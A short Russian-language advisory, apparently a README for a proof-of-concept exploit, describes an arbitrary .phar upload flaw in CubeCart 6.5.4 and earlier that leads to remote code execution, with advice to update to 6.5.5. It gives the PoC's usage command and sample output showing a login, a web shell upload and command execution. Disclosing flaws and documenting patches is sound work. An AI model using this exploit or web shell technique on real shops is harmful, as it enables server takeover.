
CubeCart <= 6.5.4 уязвим для произвольной загрузки файлов, что приводит к удалённому выполнению кода (RCE).
CubeCart <= 6.5.4 уязвим к проблеме произвольной загрузки файлов, которая приводит к удалённому выполнению кода (RCE). Уязвимость затрагивает файловый менеджер приложения и его фильтры, позволяя злоумышленникам загружать файлы .phar, содержащие вредоносный код. CubeCart следует обновить до версии 6.5.5, поскольку в ней реализован патч безопасности, устраняющий эту уязвимость.
Более подробную информацию см. в официальном объявлении CubeCart в разделе ссылок.
Был создан автоматизированный proof-of-concept (PoC), но данную уязвимость также можно эксплуатировать вручную, загрузив вредоносный файл .phar через файловый менеджер.
Использование PoC:
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
После запуска ожидаемый вывод при успешной эксплуатации выглядит так:
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami
[] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...
Output: www-data